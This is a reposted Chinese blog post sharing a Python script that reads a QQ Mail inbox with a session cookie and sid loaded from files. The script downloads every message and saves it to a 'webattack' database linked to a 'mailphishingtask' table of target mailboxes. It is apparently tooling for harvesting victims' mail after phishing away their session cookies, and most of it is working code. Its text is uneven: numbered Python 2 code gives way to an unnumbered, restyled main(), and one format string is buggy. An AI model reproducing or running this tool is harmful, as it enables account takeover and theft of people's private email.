利用 Cookie 爬取 QQ 邮箱的 Python 脚本

  1 # -*- coding: utf-8 -*-
  2 import requests
  3 import time
  4 from bs4 import BeautifulSoup
  5 import re
  6 import sys
  7 import json
  8 import pymysql
  9 
 10 
 11 def ct_content(url,payload):
 12     s = requests.session()
 13     
 14     header = {\
 15             
 16             'Referer': 'https://mail.qq.com/cgi-bin/frame_html?t=newwin_frame&sid=M6EI2PkDteRzaXkj&url=/cgi-bin/readmail?folderid=1%26folderkey=1%26t=readmail%26mailid=ZC4411-kQP8LA2p7r_ALDxmjE83W82%26mode=pre%26maxage=3600%26base=12.870000000000001%26ver=36726',
 17             'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36',
 18         
 19             'Upgrade-Insecure-Requests':'1'}
 20     
 21     f = open('cookie.txt', 'r')
 22     t = f.read()
 23     header['cookie'] = t
 24 
 25 
 26     
 27     response = s.get(url, headers=header,  params=payload, timeout=80)
 28     
 29     
 30     
 31     html = response.text
 32     
 33     return html
 34 
 35 def get_mailid(sid):
 36     ids = []
 37     for page in range(1):
 38         url = "https://mail.qq.com/cgi-bin/mail_list?"
 39         payload ='sid={0:s}=personal&folderkey=-3&page={0:s}&stype=myfolders&ver=333674.0&cachemod=maillist&cacheage=7200&r='.format(sid,page)
 40         html = ct_content(url,payload)
 41         soup = BeautifulSoup(html, 'lxml')
 42         where = soup.find_all("input")
 43 
 44         for i in where:
 45             t = str(i)
 46 
 47             xp = re.findall("value=\"(.*?)\"/>", t)
 48             if (len(str(xp)[2:-2]) == 30):
 49                 id=str(xp)[2:-2]
 50                 #print id
 51                 ids.append(id)
 52     print len(ids)
 53     return ids
 54 
 55 def get_sid():
 56     f = open('sid.txt', 'r')
 57     t = f.read()
 58     return t
 59 
 60 def get_mail(mailid,sid):
 61     url = "https://mail.qq.com/cgi-bin/readmail?"
 62     payload = 'folderid=1&folderkey=1&t=readmail&mailid={0:s}&mode=pre&maxage=3600&base=12.57&ver=16137&sid={1:s}'.format(mailid, sid)
 63     #print payload
 64     html = ct_content(url, payload)
 65     html =  html.replace("gb18030","utf-8")
 66     return html
 67     #soup = BeautifulSoup(html, 'lxml')
 68 
 69 def get_sub(html):
 70     soup = BeautifulSoup(html, 'lxml')
 71     where = soup.find_all("title")
 72     return where[0].string
 73 
 74 def fs (key, cook):
 75     cook = cook.replace('ssid', '')
 76     kl = cook.find(key)
 77     fl = cook.find(";", kl)
 78     return cook[kl+len(key)+1:fl]
 79 
 80 def get_cookie():
 81     f = open('cookie.txt', 'r')
 82     t = f.read()
 83     value = {}
 84     value['sid'] = fs('sid', t)
 85     '''
 86     value['pgv_pvi'] =  fs('pgv_pvi',t)
 87     value['pt2gguin'] = fs('pt2gguin',t)
 88     value['foxacc'] = fs('foxacc', t)
 89     value['p_skey'] = fs('p_skey', t)
 90     value['pt4_token'] = fs('pt4_token', t)
 91     value['qm_ptsk'] = fs('qm_ptsk', t)
 92     value['sid'] = fs('sid', t)
 93     value['RK'] = fs('RK', t)
 94     value['skey'] = fs('skey', t)
 95     value['uin'] = fs('uin', t)
 96     
 97     
 98     value['ptcz'] = fs('ptcz',t)
 99     value['edition'] = fs('edition',t)
100     value['ptui_loginuin'] = fs('ptui_loginuin',t)
101     value['pgv_pvid'] = fs('pgv_pvid',t)
102     value['ptisp'] = fs('ptisp',t)
103     value['pgv_si'] = fs('pgv_si',t)
104     value['wimrefreshrun'] = fs('wimrefreshrun',t)
105     value['qm_antisky'] = fs('qm_antisky',t)
106     value['qm_domain'] = fs('qm_domain',t)
107     value['qm_flag'] = fs('qm_flag',t)
108     value['qm_loginfrom'] = fs('qm_loginfrom',t)
109     '''
110     return value
111 
def main():
    """Scrape the mailbox and store every mail under the given phishing task.

    The task key is read from ``sys.argv[1]``. The matching row of
    ``mailphishingtask`` supplies the task id, user id and target mailbox;
    each listed mail is then downloaded and inserted into ``mails``.

    Raises:
        SystemExit: If no task key was passed on the command line.
        ValueError: If no task row matches the key.
    """
    # Python 2 only: make utf-8 the implicit str/unicode codec. Guarded so the
    # function also runs on Python 3, where ``reload`` is not a builtin.
    if sys.version_info[0] == 2:
        reload(sys)  # noqa: F821
        sys.setdefaultencoding('utf8')

    if len(sys.argv) < 2:
        sys.exit('usage: {0} <task key>'.format(sys.argv[0]))
    key = sys.argv[1]

    # NOTE(review): credentials are hard-coded; consider moving them to config.
    conn = pymysql.connect(host='127.0.0.1', port=3306, user='root', passwd='root', db='webattack', charset='utf8')
    try:
        cursor = conn.cursor()
        try:
            # Look the task up first so a bad key fails before any scraping,
            # and bind the key as a parameter instead of interpolating it
            # into the SQL text (it comes straight from the command line).
            cursor.execute(
                "SELECT id,uid,target FROM mailphishingtask where tkey=%s ;",
                (key,),
            )
            data = cursor.fetchone()
            if data is None:
                raise ValueError('no mailphishingtask row for tkey %r' % (key,))
            tid = int(data[0])
            uid = int(data[1])
            mailbox = data[2]

            sid = get_sid()
            mailids = get_mailid(sid)
            print(len(mailids))

            fetched = []
            for mailid in mailids:
                mail = get_mail(mailid, sid)
                fetched.append((mailid, mail, get_sub(mail)))

            # One timestamp for the whole batch, taken after the download.
            addtime = int(time.time())
            rows = [
                (mailid, mail, sub, tid, uid, mailbox, addtime)
                for mailid, mail, sub in fetched
            ]

            if rows:
                sql = 'INSERT INTO mails (mailid,mailcontent,sub,pid,uid,mailbox,addtime) VALUES (%s,%s,%s,%s,%s,%s,%s)'
                # A single batched insert and commit replaces the previous
                # one-row executemany + commit per mail.
                cursor.executemany(sql, rows)
                conn.commit()
        finally:
            cursor.close()
    finally:
        # Close the connection even when scraping or the insert fails.
        conn.close()
163 
164 
# Run the scraper only when the file is executed as a script, not on import.
if __name__ == "__main__":
    main()

猜你喜欢

转载自www.cnblogs.com/baizhu/p/9398563.html
今日推荐